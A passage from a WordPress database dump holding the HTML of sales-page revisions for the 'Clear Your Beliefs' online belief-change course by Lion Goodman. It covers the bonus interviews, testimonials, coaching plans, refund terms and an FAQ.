beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 100%;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:02:42', '2014-06-18 02:02:42', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(994, 4194, '2014-06-17 21:04:29', '2014-06-18 02:04:29', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you 